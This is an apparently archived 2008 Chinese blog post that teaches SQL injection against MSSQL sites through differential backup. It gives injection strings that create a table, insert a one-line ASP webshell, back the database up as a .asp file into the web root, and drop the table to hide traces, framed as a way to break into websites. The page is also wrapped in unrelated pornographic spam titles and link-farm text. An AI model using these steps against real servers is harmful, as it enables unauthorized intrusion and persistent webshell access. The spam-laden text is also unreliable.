青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

Ay's Blog@CNSSUESTC

sql注入之差異備分

??? 當(dāng)你有了SQL語句基本功時依然用啊D之類的工具掃管理員密碼,網(wǎng)站后臺的時候是不是千遍一律,不耐煩了呢?呵呵,當(dāng)時我也是很不耐煩了,拿個掃描器對一堆網(wǎng)站狂掃結(jié)果什么都沒有。下面我們來說個成功率更高,適用性更廣的方法,那就是傳說中的差異備分

??? 關(guān)于差異備分我想已經(jīng)臭名遠(yuǎn)洋了吧。下面我們先來簡單說下數(shù)據(jù)庫的差異備分:

?

???? 差異備份所基于的常規(guī)數(shù)據(jù)庫備份、部分備份或文件備份稱為差異的“基準(zhǔn)”或“差異基準(zhǔn)”。僅復(fù)制備份不能用作差異基準(zhǔn)。文件差異備份的基準(zhǔn)備份可以包含在完整備份、文件備份或部分備份中。有關(guān)詳細(xì)信息,請參閱在 單模式下的備分或在完整模式下的備分

差異備份只記錄自上次建立差異基準(zhǔn)后更改的數(shù)據(jù)。差異備份比差異基準(zhǔn)更小且更快,便于執(zhí)行頻繁備份,從而降低了數(shù)據(jù)丟失的風(fēng)險。

??? 除只讀數(shù)據(jù)庫之外,其他數(shù)據(jù)庫中每個文件的差異基準(zhǔn)信息均保存在主文件組的一個目錄中。每個數(shù)據(jù)庫的差異基準(zhǔn)信息亦存儲在 master 數(shù)據(jù)庫中。


————以上是引用MSDN對差異備分的解釋

??? 所謂的差異備分,就是只備分最近一次備分之后到此次備分之前所增加的那一部分?jǐn)?shù)據(jù)。打個比方我第N次備分后數(shù)據(jù)庫存放的內(nèi)容是ABCD,然后我第N+1次 備分的時候使用差異備分,此時數(shù)據(jù)庫的存放的內(nèi)容是ABCDEFG。那么我差異備分的結(jié)果就是EFG,只備分增加量。都明白了我們就開始講點有用的東西 啦,嘿嘿~~為什么要用差異備分呢?因為規(guī)模點的網(wǎng)站數(shù)據(jù)庫一般有幾十M甚至,那么你備分出來的數(shù)據(jù)就有幾十M,然后你從WEB上打開個幾十M內(nèi)容文件的 話……估計要很久吧。這么入侵的話我覺得你還是直接拿刀找網(wǎng)管讓他把后臺密碼給你好了。再者我們備分的一句話木馬會受到影響,如果數(shù)據(jù)庫中存在《或者%之 類的字符的話。可能導(dǎo)致我們小馬無法訪問。還有就是備分那么大的數(shù)據(jù)庫可能會導(dǎo)致腳本操作超時,所以我們得盡量減少我們備分出來的數(shù)據(jù)庫的大小。為什么備 分?jǐn)?shù)據(jù)庫就可以入侵網(wǎng)站了呢……我們往下跳


我不是分割線

________________________________________________________


????? 我們來介紹下SQL的備分語句:

BACKUP DATABASE ****(表示你要備分的數(shù)據(jù)庫名) TO DISK='*****'(表示你要備分的數(shù)據(jù)庫路徑) WITH DIFFERENTIAL(告訴數(shù)據(jù)庫你要進(jìn)行差異備分,如果沒有WITH DIFFERENTIAL則進(jìn)行完整備分)

?

????? 舉個例子,比如我們知道了WEB服務(wù)器的物理路徑 D:\WEB\,服務(wù)器的數(shù)據(jù)庫名為XXX

那么如果我們將一個一句話木馬插入數(shù)據(jù)庫中(后面講到)然后備分?jǐn)?shù)據(jù)庫,具體語句如下

BACKUP DATABASE XXX TO DISK='D:\WEB\AY.ASP' WITH DIFFERENTIAL

????? 注意到D:\WEB\AY.ASP沒有,意思就是說把數(shù)據(jù)庫備分到WEB目錄下而且數(shù)據(jù)庫備分文件名為AY.ASP,可喜的是? AY.ASP這個文件中存在我們的一句話木馬語句,當(dāng)服務(wù)器遇到ASP后綴名的文件時會對該文件進(jìn)行ASP解析,ASP解析的原則是遇到<%開始解 析,%>結(jié)束解析。比如我們向數(shù)據(jù)庫中插入一句話木馬,這個時候我們插入的數(shù)據(jù)是新增的數(shù)據(jù),然后用差異備分備分一個ASP文件到WEB目錄下。那 么這個ASP文件下就會存在我們的木馬內(nèi)容了。然后訪問一句話木馬,然后小馬傳大馬。

????? 別告訴我不知道怎么訪問,因為很多人還是不理解WEB物理路徑和我們訪問的URL之間的關(guān)系。簡單說下好了,比如你的WEB根目錄在這樣D:\WEB\, 文件夾下有你想訪問的文件AY.ASP。網(wǎng)站域名為http:\\xxx.xxx.xxx,那么你只要訪問http:\\xxx.xxx.xxx \AY.ASP就可以了。你的WEBSHELL就到手了,入侵服務(wù)器的進(jìn)度就完成了10%(為什么是10%呢?因為90%的難度在提權(quán)~呵呵)。

原理知道沒?接下來是實踐了,往下看之前建議你把SQL的基本語句搞懂。

來,再往下跳


我還是不是分割線

____________________________________________________________________________


????? 首先我們需要注入的數(shù)據(jù)庫類型是MSSQL的,而且這個數(shù)據(jù)庫的連接權(quán)限必須是DB_OWNER的權(quán)限。(一般MSSQL數(shù)據(jù)庫網(wǎng)站都是這個權(quán)限的)有建表的權(quán)限。滿足以上條件的網(wǎng)站其實是比較多的。呵呵……


URL;create table ay(ay1 image) --

新建一個名為AY的表 表內(nèi)存在名為AY1的圖象類型的字段

URL;backup database?數(shù)據(jù)庫名 to disk='物理路徑' with DIFFERENTIAL --?

注意,這次備分是要減小數(shù)據(jù)庫的備分量
URL;insert into ay (ay1) values (“一句話木馬") --

向你新建的表中插入一句話木馬內(nèi)容
URL;backup database?數(shù)據(jù)庫名 to disk='物理路徑'with DIFFERENTIAL --?

備分?jǐn)?shù)據(jù)庫到WEB目錄下

URL;drop table xy --

刪除表名,清理痕跡

????? 步驟介紹完了,也許大家還是有疑惑,就是為什么第2句要備分一下,比如還是上面的例子,我們備分之前數(shù)據(jù)庫存在內(nèi)容為ABCD,我們進(jìn)行差異備分,然后插 入小馬,那么數(shù)據(jù)庫內(nèi)容表為ABCDE,E代表小馬內(nèi)容。那么差異備分出來內(nèi)容為E。為什么這樣呢,因為你不知道這臺服務(wù)器多久之前備分過的,萬一這服務(wù) 器沒備分過而且數(shù)據(jù)庫內(nèi)容有幾百M呢?所以嚴(yán)謹(jǐn)點的辦法就是先備分一次在寫入一句話木馬。

posted on 2008-12-07 16:17 __ay 閱讀(394) 評論(0)  編輯 收藏 引用 所屬分類: Security

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            久久av一区二区三区| 久久频这里精品99香蕉| 欧美激情亚洲精品| 亚洲人午夜精品| 欧美顶级少妇做爰| 免费观看30秒视频久久| 1000部精品久久久久久久久| 久久免费高清视频| 久久久久久久久岛国免费| 1000部国产精品成人观看| 免费日韩av| 欧美精品成人| 亚洲在线国产日韩欧美| 亚洲欧美国产精品桃花| 国产综合久久| 亚洲欧洲日本专区| 欧美日韩一区综合| 久久久久99精品国产片| 久久野战av| 中国成人在线视频| 亚洲嫩草精品久久| 亚洲电影免费在线观看| 亚洲精品少妇30p| 国产色产综合色产在线视频| 麻豆精品视频在线观看| 欧美日韩国产不卡| 久久精品视频在线免费观看| 美女日韩欧美| 亚洲欧美日韩区| 久久综合九色综合欧美狠狠| av不卡在线观看| 欧美一区二区三区四区在线观看| 亚洲高清123| 亚洲一二区在线| 亚洲精品国久久99热| 宅男噜噜噜66国产日韩在线观看| 国产一区二区三区观看| 亚洲国产一区二区三区高清| 国产精品嫩草久久久久| 欧美成人午夜激情在线| 国产九九视频一区二区三区| 欧美国产日韩一区二区在线观看| 国产精品欧美一区二区三区奶水| 免播放器亚洲一区| 国产久一道中文一区| 亚洲精品麻豆| 在线观看日韩| 欧美在线观看一区二区三区| 亚洲一区二区影院| 欧美成人69av| 美女图片一区二区| 国产欧美一区二区三区在线老狼 | 99热在这里有精品免费| 午夜宅男久久久| 亚洲男人第一av网站| 欧美1区视频| 麻豆av福利av久久av| 国产视频一区免费看| 国产精品99久久久久久www| 亚洲精品免费在线播放| 久久一本综合频道| 久久精品在线视频| 欧美三级在线| 亚洲精选大片| 一本色道久久综合| 欧美精品自拍偷拍动漫精品| 欧美高清自拍一区| 影音先锋日韩有码| 久久视频精品在线| 免费不卡在线观看av| 激情久久久久久久| 久久久国产精品一区二区中文| 久久av一区二区三区漫画| 国产精品豆花视频| 亚洲午夜电影| 久久爱另类一区二区小说| 国产精品日韩专区| 亚洲欧美影音先锋| 久久免费一区| 亚洲激情婷婷| 欧美欧美全黄| 亚洲一区二区三区三| 欧美一区二区三区啪啪| 国产欧美在线观看一区| 欧美亚洲日本一区| 老鸭窝毛片一区二区三区| 亚洲福利久久| 欧美精品一区二区三区很污很色的 | 91久久久一线二线三线品牌| 久久亚洲色图| 91久久香蕉国产日韩欧美9色| 日韩一级片网址| 国产精品盗摄一区二区三区| 一区电影在线观看| 久久精品一区二区三区四区 | 国产精品系列在线播放| 香蕉亚洲视频| 欧美高清视频在线播放| 99riav久久精品riav| 国产精品免费网站| 久久一二三国产| 一本色道久久99精品综合| 久久精品亚洲一区二区| 亚洲人成亚洲人成在线观看图片| 欧美日韩国产成人| 欧美一区2区视频在线观看| 欧美黄色一区| 久久精品国产综合| 亚洲裸体视频| 国模吧视频一区| 欧美三日本三级三级在线播放| 欧美一区亚洲二区| 亚洲精品乱码久久久久久| 久久国产福利| 中文在线不卡视频| 在线观看国产精品网站| 国产精品萝li| 欧美理论片在线观看| 久久激情网站| 亚洲欧美激情在线视频| 亚洲国产日韩美| 久久综合福利| 欧美在线视频免费| 一本大道久久a久久精二百| 经典三级久久| 国产欧美日韩综合一区在线观看 | 欧美日韩一级黄| 久久天天狠狠| 香港久久久电影| 国产精品99久久99久久久二8| 欧美激情亚洲一区| 久久天天躁狠狠躁夜夜爽蜜月| 亚洲视频狠狠| 亚洲美女少妇无套啪啪呻吟| 精品999久久久| 国产日韩精品视频一区二区三区 | 久久精品国产91精品亚洲| 99视频国产精品免费观看| 亚洲国产高清一区二区三区| 久久婷婷人人澡人人喊人人爽| 午夜精品久久久久久久蜜桃app| 一区二区91| 亚洲破处大片| 最新日韩精品| 亚洲日本va在线观看| 亚洲国产激情| 亚洲人成网站在线播| 亚洲国产一区二区三区青草影视 | 欧美久久99| 欧美精品一区二区三| 欧美成人午夜剧场免费观看| 免费在线看一区| 欧美成人免费全部| 欧美激情精品久久久| 欧美日韩福利视频| 欧美日韩三级| 国产精品美女久久福利网站| 国产精品成人一区二区网站软件| 国产精品xxxxx| 国产精品久久久久久影视| 国产精品免费网站| 国产综合香蕉五月婷在线| 精品成人一区二区| 亚洲高清一二三区| 亚洲免费成人av| 亚洲综合成人在线| 久久国产88| 欧美黄免费看| 99视频热这里只有精品免费| 亚洲一区二区三区高清不卡| 亚洲在线观看| 久久米奇亚洲| 欧美日韩午夜剧场| 国产丝袜一区二区三区| 揄拍成人国产精品视频| 一本色道久久综合亚洲精品不卡| 亚洲伊人网站| 久久久久一区二区| 亚洲人成在线免费观看| 亚洲淫性视频| 欧美v日韩v国产v| 欧美性猛交xxxx乱大交蜜桃| 国产亚洲女人久久久久毛片| 亚洲黄色在线观看| 亚洲欧美在线一区二区| 久久一综合视频| 99天天综合性| 久久精品理论片| 欧美视频在线一区二区三区| 国内精品久久国产| 这里只有精品丝袜| 美女黄色成人网| 亚洲一区二区在线视频| 久久婷婷丁香| 国产精品日本精品| 亚洲精品一区二区三区av| 久久国产主播| 国产精品99久久久久久久vr| 久久综合给合久久狠狠狠97色69| 国产精品美女www爽爽爽|